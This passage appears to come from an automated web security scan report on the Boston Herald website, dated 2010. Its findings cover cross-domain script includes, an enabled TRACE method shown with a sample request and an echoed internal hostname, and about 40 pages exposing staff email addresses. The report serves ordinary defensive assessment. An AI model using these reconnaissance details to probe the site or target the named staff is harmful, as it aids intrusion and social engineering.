<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.192. http://bostonherald.com/track/star_tracks/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

9.193. http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/format=comments&srvc=home&position=6

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:55:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.194. http://bostonherald.com/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/srvc=home&position=6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/srvc=home&position=6

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/star_tracks/view/20101107ben_affleck_returns_unearned_spoils/srvc=home&position=6 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:52:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.195. http://bostonherald.com/track/track_gals_tv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/track_gals_tv/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /track/track_gals_tv/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.196. http://bostonherald.com/users/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:00:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 08 Nov 2010 03:00:30 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.197. http://bostonherald.com/users/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/register

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:32:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 08 Nov 2010 09:32:27 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.198. http://bostonherald.com/users/register/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/users/register/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:00:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 08 Nov 2010 03:00:51 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.199. http://bostonherald.com/weather/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/weather/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /weather/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:03:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10. TRACE method is enabled previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: bostonherald.com
Cookie: 3e4f11eb081a1ee9

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:07 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: owl.heraldinteractive.com
Cookie: 3e4f11eb081a1ee9
Max-Forwards: 10
X-Forwarded-For: 174.122.23.218
X-Forwarded-Host: bostonherald.com
X-Forwarded-Server: www.bostonherald.com
Connection: Keep-Alive

11. Email addresses disclosed previous next
There are 40 instances of this issue:

/about/home_delivery/
/blogs/entertainment/the_assistant/
/blogs/lifestyle/fork_lift/
/blogs/news/city_desk_wired/
/business/general/view/20101107ads_fueled_victory_of_question_1/srvc=home&position=also
/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5
/business/healthcare/view/20101107regulation_hurts_medical_supplier/srvc=home&position=5
/entertainment/movies/dvd/view/20101107grown_ups/srvc=home&position=also
/entertainment/music/general/view/20101107guided_tour_sates_hard-core_fans/srvc=home&position=also
/entertainment/television/general/view/20101107state_of_the_event_as_president_blair_underwood_stumps_for_nbc_drama/srvc=home&position=also
/mediacenter/
/mediacenter/index.php
/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=news&position=also
/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/
/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/srvc=home&position=also
/news/opinion/
/news/politics/view.bg
/news/politics/view/20101106pol_calls_for_ouster_of_states_gop_leader/srvc=news&position=also
/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1
/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/srvc=home&position=1
/news/regional/view.bg
/news/regional/view.bg
/news/regional/view/20101107bridge_work_hits_ducks_dinosaurs/srvc=news&position=also
/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3
/news/regional/view/20101107church-sale_plan_causes_beef/srvc=home&position=3
/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2
/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/srvc=home&position=2
/projects/your_tax_dollars.bg
/projects/your_tax_dollars.bg
/sports/baseball/red_sox/view.bg
/sports/baseball/red_sox/view/20101107adrian_gonzalez_fit_for_red_sox_eventually/srvc=home&position=also
/sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/srvc=home&position=also
/sports/football/patriots/view.bg
/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0
/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=0
/store/
/track/inside_track/view.bg
/track/inside_track/view/20101107cake_boss_is_a_jersey_boy_at_heart/srvc=home&position=also
/track/inside_track/view/20101107tracked_down_scott_listfield_terry_francona_joey_fatone__more/srvc=home&position=also
/track/inside_track/view/20101107we_hearernie_boch_jr_sean_duffy__more/srvc=home&position=also

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

11.1. http://bostonherald.com/about/home_delivery/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/about/home_delivery/

Issue detail

The following email addresses were disclosed in the response:

gsher@bostonherald.com
homedelivery@bostonherald.com
khogan@bostonherald.com

Request

Response

11.2. http://bostonherald.com/blogs/entertainment/the_assistant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/entertainment/the_assistant/

Issue detail

The following email address was disclosed in the response:

megan.johnson@bostonherald.com

Request

Response

11.3. http://bostonherald.com/blogs/lifestyle/fork_lift/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/lifestyle/fork_lift/

Issue detail

The following email address was disclosed in the response:

forklift@bostonherald.com

Request

Response

11.4. http://bostonherald.com/blogs/news/city_desk_wired/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/news/city_desk_wired/

Issue detail

The following email addresses were disclosed in the response:

JoeD@bostonherald.com
jdwinell@bostonherald.com
joed@bostonherald.com
newstips@bostonherald.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/city_desk_wired/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<a href="mailto:jdwinell@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...
<strong> newstips@bostonherald.com</strong>
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...
<a href="mailto:joed@bostonherald.com"><em>joed@bostonherald.com</em>
...[SNIP]...
<p>Leave a comment below … or better yet e-mail me at joed@bostonherald.com and we’ll get digging. Call the City Desk, too, if you’re not near a computer at 617-619-6461. What’s the hot race? Who did you vote for?</p>
...[SNIP]...
<a href="mailto:joed@bostonherald.com">JoeD@bostonherald.com</a>
...[SNIP]...

11.5. http://bostonherald.com/business/general/view/20101107ads_fueled_victory_of_question_1/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/general/view/20101107ads_fueled_victory_of_question_1/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

tgrillo@bostonherald.com

Request

Response

11.6. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

Issue detail

The following email address was disclosed in the response:

jpowell@excellentwriters.com

Request

Response

11.7. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/srvc=home&position=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/healthcare/view/20101107regulation_hurts_medical_supplier/srvc=home&position=5

Issue detail

The following email address was disclosed in the response:

jpowell@excellentwriters.com

Request

Response

11.8. http://bostonherald.com/entertainment/movies/dvd/view/20101107grown_ups/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/movies/dvd/view/20101107grown_ups/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

dwedge@bostonherald.com

Request

Response

